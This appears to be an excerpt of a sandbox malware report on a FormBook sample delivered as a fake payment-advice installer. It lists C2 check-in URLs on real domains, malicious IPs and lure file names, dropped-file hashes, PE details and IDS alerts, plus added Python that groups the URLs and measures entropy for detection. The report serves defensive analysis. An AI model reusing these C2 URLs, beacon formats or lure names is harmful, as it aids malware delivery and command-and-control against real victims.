                                                                            • www.wellnesssensation.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
                                                                            CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?CneDg=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&Dxlpd=2dmp
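The URLs in the table above share a visible shape: one short path segment (hko6, jskg, rrrq, bw82, ...), a query of exactly two parameters with randomly named keys, and a longer value drawn from the base64 alphabet. Several entries on the same host also carry the same leading characters in that long value. The Python below is an added example, not part of the Joe Sandbox report and not Joe Security's code: it parses a subset of the URLs copied from the table, groups them by host and path segment, and reports the common prefix of the long value per group. The pattern check and its thresholds are assumptions derived from the table, not a report field or a published signature.

```python
"""Group the C2-style URLs listed in the context table above.

Added example, not part of the Joe Sandbox report. The URL strings are copied
from the table; the pattern check and the thresholds in it are assumptions
made here, not report fields.
"""
import re
from collections import defaultdict
from os.path import commonprefix
from urllib.parse import urlsplit

# Copied from the context table above (observed, not fabricated).
OBSERVED_URLS = [
    "www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh",
    "www.whowealth.com/rrrq/?ATxdA4s=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGYJufmNHL9RwStorzg==&4hO=uDHPhJIxONuPbDb",
    "www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L",
    "www.wellnesssensation.com/bw82/?9r=Cxl0GPu0O4YH8&lL08q=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==",
    "www.wellnesssensation.com/bw82/?jL34YR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&w0=mfJDabjXTrYll",
    "www.wellnesssensation.com/bw82/?9rjHF6y=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vohabTLMb1R2mnPA==&lX9d=p48hVnrp1tqPRT7P",
    "www.digitalkn.com/jzvu/?p0D=mfTHKdP8fLydF&jL04ln=cEqLwIJ+aRwkZKINSQ3QvunM083gkoJjrLpUcp3aBa64+rAHYbkeaE3nOi790R8PidGw",
    "www.digitalkn.com/jzvu/?lf=cEqLwIJ7aWwgZaEBQQ3QvunM083gkoJjrLxEAqrbF665+asBfL1SMAPlNHXrwB48pebAWQ==&JreT=PJE0oxE",
    "www.bsf.xyz/krc/?XPGx_BL8=oSG3T25g44YEqdHLNcXBvI98o2n2iP7ZIEUUkJplaCBty9zlxmxYbQ+JtR5ITo/P6k1v&5jrH=7n6ti6PHWBWtUvjp",
]

# Base64 alphabet with optional padding. '+' and '/' must survive, so the
# query is split by hand instead of through urllib's form decoding.
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_c2_url(url):
    """Return host, first path segment, raw query pairs and the longest value."""
    if "://" not in url:
        url = "http://" + url          # the table lists host-relative URLs
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    pairs = []
    for item in parts.query.split("&"):
        if item:
            key, _, value = item.partition("=")   # values may end in '=='
            pairs.append((key, value))
    return {
        "host": parts.hostname or "",
        "path_token": segments[0] if segments else "",
        "params": pairs,
        "payload": max((v for _, v in pairs), key=len, default=""),
    }


def looks_like_listed_pattern(rec):
    """Assumed heuristic derived from the table: one short alphanumeric path
    segment, exactly two query parameters, and a longer value that is a
    base64-alphabet string of at least 40 characters."""
    if not re.fullmatch(r"[a-z0-9]{2,5}", rec["path_token"]):
        return False
    if len(rec["params"]) != 2:
        return False
    payload = rec["payload"]
    return len(payload) >= 40 and bool(B64_VALUE.match(payload))


def summarize(urls):
    """Per (host, path segment): URL count, whether every entry matches the
    heuristic, and the longest common prefix of the long query values."""
    groups = defaultdict(list)
    for url in urls:
        rec = parse_c2_url(url)
        groups[(rec["host"], rec["path_token"])].append(rec)
    return {
        key: {
            "count": len(recs),
            "all_match_pattern": all(looks_like_listed_pattern(r) for r in recs),
            "payload_prefix": commonprefix([r["payload"] for r in recs]),
        }
        for key, recs in groups.items()
    }


if __name__ == "__main__":
    for (host, token), info in sorted(summarize(OBSERVED_URLS).items()):
        print(f"{host}/{token}/  n={info['count']}  "
              f"shared payload prefix={info['payload_prefix']!r}")
```

Run as a script it prints one line per host/path pair. For the bw82 and rrrq groups the shared prefix is 57 characters long; for the two jzvu entries it is only 7, so a prefix that is stable within one group is not stable across groups and is not a safe cross-campaign indicator on its own.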

Domains

Match: parkingpage.namecheap.com
Associated Sample | Detection | Context
gqnTRCdv5u.exe | malicious | 198.54.117.211
eQLPRPErea.exe | malicious | 198.54.117.215
PaymentAdvice.exe | malicious | 198.54.117.218
DYANAMIC Inquiry.xlsx | malicious | 198.54.117.216
Quotation Zhejiang.xlsx | malicious | 198.54.117.215
TACA20210407.PDF.exe | malicious | 198.54.117.212
46578-TR.exe | malicious | 198.54.117.218
ALPHA SCIENCE, INC.exe | malicious | 198.54.117.216
SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe | malicious | 198.54.117.217
1517679127365.exe | malicious | 198.54.117.216
BL-2010403L.exe | malicious | 198.54.117.218
Shinshin Machinery.exe.exe | malicious | 198.54.117.212
PDF NEW P.OJerhWEMSj4RnE4Z.exe | malicious | 198.54.117.217
INV-210318L.exe | malicious | 198.54.117.212
Inquiry.docx | malicious | 198.54.117.218
BL Draft copy.exe | malicious | 198.54.117.215
Order.exe | malicious | 198.54.117.210
PO.1183.exe | malicious | 198.54.117.211
TSPO0001978-xlxs.exe | malicious | 198.54.117.216
evaoRJkeKU.exe | malicious | 198.54.117.210

ASN

Match: NAMECHEAP-NETUS
Associated Sample | Detection | Context
nova narudžba pdf rvP6N.exe | malicious | 63.250.37.200
gqnTRCdv5u.exe | malicious | 198.54.117.211
Calt7BoW2a.exe | malicious | 63.250.43.5
eQLPRPErea.exe | malicious | 198.54.117.215
vbc.exe | malicious | 198.54.117.244
000OUTQ080519103.pdf.exe | malicious | 198.54.126.159
PaymentAdvice.exe | malicious | 198.54.117.218
DYANAMIC Inquiry.xlsx | malicious | 198.54.117.216
Quotation Zhejiang.xlsx | malicious | 198.54.117.215
quotation.exe | malicious | 162.0.229.227
PU Request Form Hardware.exe | malicious | 198.54.126.165
URGENT INQUIRY.exe | malicious | 198.54.126.165
8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls | malicious | 63.250.38.60
8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls | malicious | 63.250.38.60
8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls | malicious | 63.250.38.60
Protected Client.js | malicious | 199.192.24.250
one new parcel.exe | malicious | 199.193.7.228
Protected Client.js | malicious | 199.192.24.250
LIHUA Technology HK Order Items.exe | malicious | 198.54.114.191
234501209-416_000_decrypted.xls | malicious | 63.250.38.60

Match: DOSARRESTUS
Associated Sample | Detection | Context
Order.exe | malicious | 52.128.23.218
MACHINE SPECIFICATION.exe | malicious | 52.128.23.153
bank details.exe | malicious | 52.128.23.218
50729032021.xlsx | malicious | 52.128.23.153
MACHINE SPECIFICATIONS.exe | malicious | 52.128.23.153
Shipping Documents C1216.exe | malicious | 52.128.23.153
9V3LjvhSMb.exe | malicious | 52.128.23.153
RDAW-180-47D.exe | malicious | 52.128.23.153
gV8xdP8bas.exe | malicious | 52.128.23.153
m5bCbJdk7l.exe | malicious | 52.128.23.153
xloa.exe | malicious | 52.128.23.153
rbyB1UHXxR.exe | malicious | 52.128.23.153
4137.exe | malicious | 52.128.23.153
COAU7229898130.xlsx | malicious | 52.128.23.153
RFQ_OB Jiefeng E&E Co Ltd.exe | malicious | 52.128.23.153
FB_1401_4_5,pdf.exe | malicious | 52.128.23.153
55gfganfgF.exe | malicious | 52.128.23.153
QUOTATION00187612.exe | malicious | 52.128.23.153
IKtgCGdzlg.exe | malicious | 52.128.23.153
vB1Zux02Zf.exe | malicious | 52.128.23.153

Match: NOCIXUS
Associated Sample | Detection | Context
TRANSFER CONFIRMATION_PDF.exe | malicious | 192.187.111.221
P1 032021.exe | malicious | 192.187.111.221
CUFUYO.exe | malicious | 192.187.111.219
Quotation.zip.exe | malicious | 192.187.111.222
SWIFT COPY_pdf.exe | malicious | 107.150.55.90
shippingdoc_pdf.exe | malicious | 192.187.111.222
Swift_18442.exe | malicious | 192.187.120.242
i7DmAbXBCN.exe | malicious | 192.187.111.220
Order 1759-pdf.exe | malicious | 107.150.55.90
Order List - 022321-xlxs.exe | malicious | 107.150.55.90
HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe | malicious | 192.187.111.219
order pdf.exe | malicious | 192.187.111.219
NWvnpLrdx4.exe | malicious | 198.204.251.78
drTj5hZSCU.exe | malicious | 192.187.111.219
PO_210205.exe | malicious | 107.150.35.42
DHL00130.exe.exe | malicious | 192.187.111.219
MPbBCArHPF.exe | malicious | 192.187.111.221
Statement for T10495.jar | malicious | 192.187.111.221
ucPCgX1NlH.exe | malicious | 192.187.111.220
SHEXD2101127S_ShippingDocument_DkD.xlsx | malicious | 192.187.111.221

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\13ziwk3feeh4cg3
Process: C:\Users\user\Desktop\Betaling_advies.exe
File Type: data
Category: dropped
Size (bytes): 164864
Entropy (8bit): 7.99882353222341
Encrypted: true
SSDEEP: 3072:wJv7/Tz7+BuFMDnbz1WmD0L1LAtdVRp6ARGYqbQ644JHmGkxeaRpN:wJTzbebz1z4LOHfprkbJIeqpN
MD5: A05C0E94DC1282B91B96F6C1FDD5F63F
SHA1: F14CFFEC41EAA56F524912CEAB1E22BA12361723
SHA-256: AFE9B2D1BDEC48CA8651243CDF592C19D2C2A893F44606F590AFE9617FF082CA
SHA-512: E46BA9BCBA244042FC9FAF770690F27E129C7EEC20FFB57235684117CC56CB13EC5BAB42243B537C49C705286B5D697143925DAEA329EFEE9E579D96D631374F
Malicious: false
Reputation: low
                                                                            Preview: ..Ri~.._,...TU..?g..].w..`..(5HJ)...'T],.9V..8.5C.=.q1y.5..*...u...`.=.Uki....P4.SV..a4.q7..X...m........l...'s1..3..KF.c..u.R...m..).{=j&ff,.K.9.%.(_...%LU...s..F.......^..:..:."...'.O{....%.'..._.k.fq..h]i.'....m.t.Tl.M;.....&...%T2..[Y:Z.PW..+..Ht.R................qho...]q......*.3.j..6...j.".JO-......'..)7.m>uGU%P_~..E.P...@t..Z1..h.D......`..T.A_.ve....=!bs.1..[7.#.....s.,.9%..X."..Z_T.9<.:...e.M.a..m...._.4p..>.<.|.9.."..5....^o.?..i4.si.......{.>.K..D.*4...V.....0....`N"G..'..,.....a..>@..F...XU.....M.X....3b...`}j.3Z..ti*.^:...U.B..TU..../`.n<...6...lnV<lRx:.'..l....[..T..^2..+..uW.\.1dD$........HV.T......@...6..L..$o.~..ko(s..`.......L.=.........R..x..a....s.F!....<0.....8.]......h.......]P..0...L..).c.v,..............P...!.qJ.e$8-"..4.&.8.uY...'.b......m.xb]..S..=...%.5VQ.h.-em. ..\.`.x.9...U..U.......?.\.a.r3y.8.-@RZ..(z.......o....S.fm..|.\...Y.....S.`w..3..f..6.,L.>..@.........q.%........}*-....t.#......o.P.5v..f.p.F<.O*..
C:\Users\user\AppData\Local\Temp\ac9e2jpx87kriao
Process: C:\Users\user\Desktop\Betaling_advies.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.964101605023504
Encrypted: false
SSDEEP: 192:HV1mVwMvYyy6j1hWt5eSOpeMVcThjrdbf:HHmClb0qt5eSsctjr5f
MD5: E04C934C0F6F1EA4EA554E1B0BEC3345
SHA1: 531D7A76E92E43CF60C78DC87BE67EA0D68E55EA
SHA-256: 677B71A1EE607B1D4ACA21E24D5A8CD71A4DE1B9E5A9169DB5D9EFB99845EEAB
SHA-512: 84F8469D89BB7A4FEC88ABBF04E29EF23C989DF9B962F529D8FEABA34496FB80CAF8693A0DAF90AF382EC9E8A4BF024E194B809FA2C9C2D8442A18C9F5BC3845
Malicious: false
Reputation: low
                                                                            Preview: ..gt..T...'......5.C.!.WC....A$l5.^...[...l..'@...W......1#.r9\.s.S4...up.g.B.J..Ne.H....^Y...O.........c.#.....!........5......]..=.....O.|..&.R.......W%..G%..u.1.....oJG..}..<]..HP..a..].A....0...x (&Mf.s..-.Q.E...3B.7...K`.>.5>.[c.....*d1.....&.F.!O@.W.t..%...U.Q.M"...F..J.Y..:YJ\.D.H^d..4D....w......<R.(.Y.=.+.,..Zn.s..vpW.TD.3.....k.v-.!;.Coj.....-..{.%{ic..M..r...T.f.&.-.#......L....V.?.%.........%]V8Ag.H9..C....r...JU....-...P...2.jt&#x.....CV.^.3.......B..7.._/Q.........".`.d..@.r...Z|..h...DJ.L.p>._x.}..f......e.S..tW;d..n....E...s..YnB...Z..!....5.a...<F=.}..e.6........G.)....J.QS..}.H.b..1\.w..P...L..k.......R.........+..P..u..q...6.If..u..C..M.L....?w.)..L!.aPQ.o4..-.g...px.....\.....2o.X-.......'.v....mf`...J..`.U.e.|...?m2....t....lx$2@[.[..,...l.}.t.`.m......U.....n.A..).(.,.fS..-.Z...*p..-(.Y.@..../..C.........TE.5...F......&..*..`O..$=....@BM.al.Z{.KI.E..?.{....M.l.`..]........60...1.^.............jxj[.CV.....RX..
C:\Users\user\AppData\Local\Temp\nsx3A6A.tmp\571kzkbal.dll
Process: C:\Users\user\Desktop\Betaling_advies.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4096
Entropy (8bit): 4.120535253677883
Encrypted: false
SSDEEP: 48:vpgmHlS8KacYHvPviTLNuLebdsbriB4ZYmRC:BvPAyvPvinktfiuZVR
MD5: 4166A64CE914F377E415C32E619E5A71
SHA1: 7F9ABEFA1A35AA1D9E1ABD65C92B46DCD0A20BBE
SHA-256: 8D8B7E7780DB1D8172AA4499EC92942824DDEFF55026DBEE8BC40FD48547F317
SHA-512: 2D3AC79AE8012657F81E114971C01C14FD902AB57B8ECAC50A879510BFA5241AEA6426DD3640E3BADC661402F5B55A57302D5F822D51A41EF4EDB627AAA97194
Malicious: false
Reputation: low
                                                                            Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L..." ..............................................$"...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
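The dropped-file entries above carry an 8-bit entropy value and an Encrypted flag: the 164864-byte blob (entropy 7.9988) is flagged encrypted, the 6661-byte blob (entropy 7.964) is not, and the 4096-byte DLL under nsx3A6A.tmp has low entropy. The Python below is an added example, not Joe Sandbox code: it computes the entropy, applies an assumed size-plus-entropy rule that reproduces those three outcomes, and checks a drop set for the layout seen here (a large high-entropy non-PE blob beside a small DLL in an ns*.tmp directory). The byte strings are constructed in the code, and the rule's thresholds are assumptions rather than the report's actual logic.

```python
"""Entropy and dropper-layout check for the dropped files listed above.

Added example, not Joe Sandbox code. The byte strings are constructed here so
the code runs offline; the size-plus-entropy rule and its thresholds are
assumptions that reproduce the three Encrypted outcomes above, not the
report's actual rule.
"""
import math
import random
from collections import Counter


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant file,
    8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_probably_encrypted(data, min_entropy=7.9, min_size=16384):
    """Assumed rule: call a blob encrypted (or compressed) only when both size
    and entropy are high. A few KB of random-looking bytes cannot be told
    apart from a key or configuration blob, so size is required as well."""
    return len(data) >= min_size and shannon_entropy(data) >= min_entropy


def classify_drop(path, data):
    """Describe one dropped file with the fields the table above uses."""
    return {
        "path": path,
        "size": len(data),
        "entropy": round(shannon_entropy(data), 4),
        "pe": data[:2] == b"MZ",
        "encrypted": is_probably_encrypted(data),
    }


def nsis_payload_layout(drops):
    """True when the drop set has the layout listed above: at least one large
    high-entropy non-PE blob plus a small PE DLL inside an ns*.tmp directory.
    A layout check derived from the table, not a FormBook signature."""
    blobs = [d for d in drops if not d["pe"] and d["encrypted"]]
    stubs = [d for d in drops if d["pe"] and d["size"] <= 16384
             and "\\ns" in d["path"] and ".tmp\\" in d["path"]]
    return bool(blobs) and bool(stubs)


def constructed_drops():
    """Constructed stand-ins with the sizes from the table: seeded pseudo-random
    bytes for the two blobs, an MZ header padded with zeros for the DLL.
    Contents are synthetic; only the sizes and paths come from the report."""
    rng = random.Random(383925)
    temp = "C:\\Users\\user\\AppData\\Local\\Temp\\"
    blob_large = bytes(rng.getrandbits(8) for _ in range(164864))
    blob_small = bytes(rng.getrandbits(8) for _ in range(6661))
    stub_dll = b"MZ" + b"\x00" * 4094
    return [
        (temp + "13ziwk3feeh4cg3", blob_large),
        (temp + "ac9e2jpx87kriao", blob_small),
        (temp + "nsx3A6A.tmp\\571kzkbal.dll", stub_dll),
    ]


if __name__ == "__main__":
    drops = [classify_drop(p, d) for p, d in constructed_drops()]
    for d in drops:
        print(f"{d['path']}\n  size={d['size']} entropy={d['entropy']} "
              f"pe={d['pe']} encrypted={d['encrypted']}")
    print("NSIS payload layout:", nsis_payload_layout(drops))
```

Uniform random data of n bytes has an expected entropy of roughly 8 - 255/(2 n ln 2), which gives about 7.999 for 164864 bytes and about 7.97 for 6661 bytes, close to the two values the report lists. That is why an entropy threshold alone would flag the small blob too, and why the assumed rule also requires a minimum size.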

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.904368951251504
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Betaling_advies.exe
File size: 206528
MD5: 5011945cdee260fb8688b06568d007b3
SHA1: c0e27a58017d0cf737b86ff3ced063d120f7badd
SHA256: 96bd9ed85e93c31a337a92e99fd6e1966f68f1a28fef43a21da725c36405988c
SHA512: d18287d8e88f9bd61ddd31245c9255aec80fbce710c6325933fdc914c563b765f2bfe38735cd743c6cbb31c916810a4a8cefde0b2eecda32f7b98fc570032e36
SSDEEP: 3072:HyewmN4skJ6n/lSJv7/Tz7+BuFMDnbz1WmD0L1LAtdVRp6ARGYqbQ644JHmGkxeq:HdD/oJTzbebz1z4LOHfprkbJIeqpG6
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                            File Icon

                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x40314a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            sub esp, 0000017Ch
                                                                            push ebx
                                                                            push ebp
                                                                            push esi
                                                                            xor esi, esi
                                                                            push edi
                                                                            mov dword ptr [esp+18h], esi
                                                                            mov ebp, 00409240h
                                                                            mov byte ptr [esp+10h], 00000020h
                                                                            call dword ptr [00407030h]
                                                                            push esi
                                                                            call dword ptr [00407270h]
                                                                            mov dword ptr [007A3030h], eax
                                                                            push esi
                                                                            lea eax, dword ptr [esp+30h]
                                                                            push 00000160h
                                                                            push eax
                                                                            push esi
                                                                            push 0079E540h
                                                                            call dword ptr [00407158h]
                                                                            push 00409230h
                                                                            push 007A2780h
                                                                            call 00007F3F90CC2918h
                                                                            mov ebx, 007AA400h
                                                                            push ebx
                                                                            push 00000400h
                                                                            call dword ptr [004070B4h]
                                                                            call 00007F3F90CC0059h
                                                                            test eax, eax
                                                                            jne 00007F3F90CC0116h
                                                                            push 000003FBh
                                                                            push ebx
                                                                            call dword ptr [004070B0h]
                                                                            push 00409228h
                                                                            push ebx
                                                                            call 00007F3F90CC2903h
                                                                            call 00007F3F90CC0039h
                                                                            test eax, eax
                                                                            je 00007F3F90CC0232h
                                                                            mov edi, 007A9000h
                                                                            push edi
                                                                            call dword ptr [00407140h]
                                                                            call dword ptr [004070ACh]
                                                                            push eax
                                                                            push edi
                                                                            call 00007F3F90CC28C1h
                                                                            push 00000000h
                                                                            call dword ptr [00407108h]
                                                                            cmp byte ptr [007A9000h], 00000022h
                                                                            mov dword ptr [007A2F80h], eax
                                                                            mov eax, edi
                                                                            jne 00007F3F90CC00FCh
                                                                            mov byte ptr [esp+10h], 00000022h
                                                                            mov eax, 00000001h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                            Data Directories

                                                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x7344           0xb4          .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3ac000         0x900         .rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x280         .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                            Sections

                                                                            Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                            .text   0x1000           0x59de        0x5a00    False     0.681293402778   data       6.5143386598   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata  0x7000           0x10f2        0x1200    False     0.430338541667   data       5.0554281206   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data   0x9000           0x39a034      0x400     unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .ndata  0x3a4000         0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc   0x3ac000         0x900         0xa00     False     0.409375         data       3.94574916515  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            Name           RVA       Size   Type                                                                          Language  Country
                                                                            RT_ICON        0x3ac190  0x2e8  data                                                                          English   United States
                                                                            RT_DIALOG      0x3ac478  0x100  data                                                                          English   United States
                                                                            RT_DIALOG      0x3ac578  0x11c  data                                                                          English   United States
                                                                            RT_DIALOG      0x3ac698  0x60   data                                                                          English   United States
                                                                            RT_GROUP_ICON  0x3ac6f8  0x14   data                                                                          English   United States
                                                                            RT_MANIFEST    0x3ac710  0x1eb  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

                                                                            Imports

                                                                            DLL           Import
                                                                            KERNEL32.dll  CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                            USER32.dll    ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                            GDI32.dll     SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                            SHELL32.dll   SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                            ADVAPI32.dll  RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                            COMCTL32.dll  ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                            ole32.dll     OleInitialize, OleUninitialize, CoCreateInstance
                                                                            VERSION.dll   GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                            Possible Origin

                                                                            Language of compilation system  Country where language is spoken  Map
                                                                            English                         United States

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                                                            04/08/21-12:38:24.397244  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49742      34.102.136.180  192.168.2.4
                                                                            04/08/21-12:38:39.930010  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49756        80         192.168.2.4     34.102.136.180
                                                                            04/08/21-12:38:39.930010  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49756        80         192.168.2.4     34.102.136.180
                                                                            04/08/21-12:38:39.930010  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49756        80         192.168.2.4     34.102.136.180
                                                                            04/08/21-12:38:40.043974  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49756      34.102.136.180  192.168.2.4
                                                                            04/08/21-12:38:55.586497  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49763        80         192.168.2.4     52.128.23.153
                                                                            04/08/21-12:38:55.586497  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49763        80         192.168.2.4     52.128.23.153
                                                                            04/08/21-12:38:55.586497  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49763        80         192.168.2.4     52.128.23.153
                                                                            04/08/21-12:39:00.894391  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49764      34.102.136.180  192.168.2.4
                                                                            04/08/21-12:39:38.152108  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49771        80         192.168.2.4     156.241.53.253
